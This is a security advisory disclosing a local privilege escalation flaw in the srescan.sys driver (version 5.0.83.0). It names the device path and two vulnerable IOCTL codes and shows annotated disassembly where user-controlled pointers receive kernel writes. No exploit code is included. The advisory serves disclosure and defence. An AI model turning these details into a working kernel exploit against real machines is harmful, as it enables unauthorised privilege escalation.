Srescan.sys is exposed through the following DOS device: "\\.\SreScan". Restricted accounts, including guest users, can access privileged IOCTLs implemented within the affected driver. In addition to this potential risk factor, the driver does not validate user-mode buffers in Type3, thus leading to local privilege escalation due to arbitrary kernel memory overwrite.

DosDevice: \\.\Srescan
Driver: srescan.sys
Version: 5.0.83.0

- IOCTL 0x2220CF

    .text:00013127  mov     ecx, [ebp+arg_10]
    .text:0001312A  cmp     dword ptr [ecx], 4
    .text:0001312D  jnz     short loc_1313F
    .text:0001312F  mov     edx, [ebp+FileInformation]
    .text:00013132  mov     dword ptr [edx], 3h         ; edx controlled
    .text:00013138  xor     esi, esi
    .text:0001313A  mov     [ebp+var_1C], esi
    .text:0001313D  jmp     short loc_1315F

- IOCTL 0x22208F

    .text:00014091  mov     ebp, ds:ExAllocatePoolWithTag
    .text:00014097  mov     esi, 2h
    .text:0001409C  push    31565244h                   ; Tag
    .text:000140A1  push    esi                         ; NumberOfBytes
    .text:000140A2  push    0                           ; PoolType
    .text:000140A4  call    ebp                         ; ExAllocatePoolWithTag
    .text:000140A6  mov     ebx, eax
    .text:000140A8  test    ebx, ebx
    .text:000140AA  jz      short loc_140F3
    .text:000140AC  mov     edi, ds:ZwQuerySystemInformation
    .text:000140B2
    .text:000140B2 loc_140B2:                          ; CODE XREF: sub_14070+81j
    .text:000140B2  lea     ecx, [esp+1Ch+ReturnLength]
    .text:000140B6  push    ecx                         ; ReturnLength
    .text:000140B7  push    esi                         ; SystemInformationLength
    .text:000140B8  push    ebx                         ; SystemInformation
    .text:000140B9  push    5                           ; SystemInformationClass
    .text:000140BB  call    edi                         ; ZwQuerySystemInformation
    .text:000140BD  cmp     eax, 0C023h
    .text:000140C2  mov     [esp+1Ch+var_4], eax
    .text:000140C6  jz      short loc_140D6
    .text:000140C8  cmp     eax, 8005h
    .text:000140CD  jz      short loc_140D6
    .text:000140CF  cmp     eax, 0C004h
    .text:000140D4  jnz     short loc_14102

    .text:0001411D loc_1411D:                          ; CODE XREF: sub_14070+112j
    .text:0001411D  mov     eax, [edx+44h]
    .text:00014120  test    eax, eax
    .text:00014122  jz      short loc_1417A

    [...]

    .text:00014154  mov     dword ptr [eax+4], 0
    .text:0001415B  mov     esi, [edx+3Ch]
    .text:0001415E  lea     edi, [eax+0Ch]              ; edi = OutputBuffer. Controlled
    .text:00014161  mov     eax, ecx
    .text:00014163  shr     ecx, 2
    .text:00014166  rep movsd
    .text:00014168  mov     ecx, eax
    .text:0001416A  mov     eax, [esp+1Ch+var_8]
    .text:0001416E  and     ecx, 3
    .text:00014171  inc     eax
    .text:00014172  rep movsb
    .text:00014174  mov     [esp+1Ch+var_8], eax
    .text:00014178  mov     edi, eax

Exploits:
No exploits are released. Ethical security companies can contact for requesting samples: contact (at) reversemode (dot) com [email concealed]

References:
  www.zonelabs.com
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=517
  http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=48 (PDF)

---
Reversemode
Advanced Reverse Engineering Services
www.reversemode.com